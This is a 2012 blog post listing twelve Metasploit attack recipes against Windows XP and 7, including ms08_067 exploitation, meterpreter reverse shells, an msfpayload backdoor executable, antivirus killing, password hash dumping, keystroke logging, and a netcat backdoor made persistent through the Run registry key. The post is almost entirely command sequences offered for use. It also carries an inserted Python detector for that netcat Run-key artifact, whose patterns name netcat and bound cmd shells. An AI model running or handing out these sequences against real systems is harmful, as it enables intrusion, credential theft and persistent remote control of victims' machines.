Tuesday, October 9, 2012

Some Metasploit Attacks



Today I will show you some Metasploit attacks.
Requirements:
BackTrack.
Metasploit.

These are just some commands; there are lots of options in Metasploit. You can use them according to the vulnerability.

Attack 1: Hacking Windows XP with Metasploit tutorial - VNC remote control

use windows/smb/ms08_067_netapi
show options
set RHOST 192.168.1.1 ----->IP target
set payload windows/vncinject/bind_tcp
exploit

Attack 2: Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.1 ----->IP Attacker
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell

Attack 3: Hacking by Metasploit, Windows XP SP3
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.1 --->ip attacker
set RHOST 192.168.1.1 ----->ip target
set payload windows/meterpreter/reverse_tcp
exploit

Attack 4: Hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.1 ------>ip attacker
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show options
set EndOnSession false
show options
set RHOST 192. ------>ip target
set RPORT 4321
show options
exploit

Attack 5: Exploit vulnerability in Windows 7
sudo nmap 192.168.1.1 ------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1 -----------ip target
set RPORT 445
run ----run the exploit

Attack 6: Metasploit backdooring
msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.1 X >backdoor.exe
root@kislay# cd /tmp
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.1 --->Listener's IP (Attacker)
show options
exploit
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen

Attack 7: ms10 025 metasploit exploitation
nmap -O 192.168.1.7 ----->see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.7 --ip target
exploit

Attack 8: IEPeers: ms10_018_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info ---->Available targets: 1 IE 6 SP0-SP2 (onclick)
exploit
using url: http://192.168.1.1:8080/
Open Mozilla or whatever browser is used
type: http://192.168.1.1:8080/ ---enter
wait a few moments...

Attack 9: metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1 ---->ip target
set LHOST 192.168.0.1 ----->ip attacker
exploit
help
use -m process
execute -f cmd.exe -c
interact 1
c:\winnt\system32\>dir

Attack 10: Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.exe
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555
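
For defenders, the Run-key change in Attack 10 leaves a recognizable artifact: an autostart value whose command line starts a netcat listener bound to cmd.exe. The following detection logic is an added example, not part of the original post; the sample `reg query` text, the rule set and the function names are constructed for illustration.

```python
import re

# Constructed sample: text in the shape printed by
# `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run`.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    C:\Program Files\VMware\VMware Tools\vmtoolsd.exe -n vmusr
    windows live    REG_SZ    c:\WINDOWS\SYSTEM32\netcat.exe -L -d -p 5555 -e cmd.exe
    Updater    REG_SZ    C:\Tools\backup.exe -p 5555
"""

# Value lines are "<4 spaces>name<4 spaces>type<4 spaces>data"; names may contain spaces.
ENTRY = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")

# Assumed rule set (illustrative, not exhaustive): each rule is weak on its own.
RULES = [
    ("netcat-style binary", re.compile(r'(?i)(^|[\\/"\s])(nc|ncat|netcat)(\.exe)?(\s|"|$)')),
    ("shell bound to socket (-e)", re.compile(r'(?i)\s-e\s+"?\S*(cmd|powershell)(\.exe)?')),
    ("persistent listener (-L/-l with -p)", re.compile(r"\s-[lL]\b.*\s-p\s+\d+")),
]

def parse_run_entries(text):
    """Return (name, data) for each value line of reg-query style output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            entries.append((m.group("name"), m.group("data").strip()))
    return entries

def suspicious_run_entries(text, min_hits=2):
    """Flag Run values whose command line matches at least min_hits rules."""
    findings = []
    for name, data in parse_run_entries(text):
        hits = [label for label, rx in RULES if rx.search(data)]
        if len(hits) >= min_hits:
            findings.append({"name": name, "data": data, "reasons": hits})
    return findings

if __name__ == "__main__":
    for f in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"[!] {f['name']!r}: {f['data']}")
        for reason in f["reasons"]:
            print(f"      - {reason}")
```

Requiring two or more rule hits keeps an unrelated program that merely takes a `-p` argument from being flagged.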

Attack 11: BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter your choice: 4
Enter the IP address: 192.168.1.1
Enter choice (hit enter for default): 2
Enter choice (hit enter for default): 16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3 ---------->msf.exe
cd /pentest/exploits/SET# cd ..

/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
execute -f cmd
ipconfig
shell
screenshot
execute -f explorer

Attack 12: ms08_067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\

3 comments:

Basant said...

Can you tell what each of these attacks does?

Animesh said...

Suckx

Unknown said...

Can you tell what each of these attacks does? Can you tell us a small description?
